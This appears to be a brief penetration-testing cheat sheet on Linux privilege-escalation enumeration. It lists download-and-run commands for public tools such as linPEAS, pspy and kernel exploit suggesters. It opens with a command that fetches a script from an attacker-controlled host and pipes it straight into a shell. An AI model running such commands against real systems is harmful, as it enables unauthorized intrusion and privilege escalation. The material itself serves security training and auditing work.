1 minute read

Execution of Scripts

You can use the following method to download, execute, and store the output:

wget http://<Attacker_IP>/<script_name> -O- | sh | tee output.txt

Use writable directories like:

/tmp
/dev/shm

linPEAS

Comprehensive and frequently updated Linux privilege escalation auditing script.

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh | tee linpeas_output.txt

bangenum.sh

Lightweight initial Linux enumeration script.

wget https://raw.githubusercontent.com/bngr/OSCP-Scripts/master/bangenum.sh
sed -i -e 's/
$//' bangenum.sh
chmod +x bangenum.sh
./bangenum.sh

pspy

View running processes, cron jobs, and other background tasks without root.

wget https://github.com/DominicBreuker/pspy/releases/latest/download/pspy64
chmod +x pspy64
./pspy64

linux-smart-enumeration

Smart and adaptive Linux enumeration script.

wget https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh
chmod +x lse.sh
./lse.sh -l1

SUID3NUM

SUID binary enumeration script.

wget https://raw.githubusercontent.com/Anon-Exploiter/SUID3NUM/master/suid3num.py
python3 suid3num.py

xploit_installer.py

Exploit suggester with Exploit-DB integration.

wget https://raw.githubusercontent.com/wwong99/pentest-notes/master/scripts/xploit_installer.py
python3 xploit_installer.py <exploit_id>

unix-privesc-check (upc.sh)

Classic script for Unix privilege escalation checks.

wget https://raw.githubusercontent.com/pentestmonkey/unix-privesc-check/master/upc.sh
chmod +x upc.sh
./upc.sh

linux-local-enum.sh

Simple local Linux privilege escalation enumeration script.

wget https://raw.githubusercontent.com/Arr0way/linux-local-enumeration-script/master/linux-local-enum.sh
chmod +x linux-local-enum.sh
./linux-local-enum.sh

linuxprivchecker.py

Python-based Linux privilege checker.

wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py
python3 linuxprivchecker.py

linux-exploit-suggester.sh

Suggests Linux kernel exploits based on system version.

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh

KernelPop

Kernel exploit enumeration and suggestion tool.

git clone https://github.com/spencerdodd/kernelpop.git
cd kernelpop
python3 kernelpop.py --os linux --priv

Remember

  • Use non-invasive scanning before attempting any exploits.
  • Avoid anything that “automatically runs exploits” in real or exam environments.

You May Also Enjoy

Linux

less than 1 minute read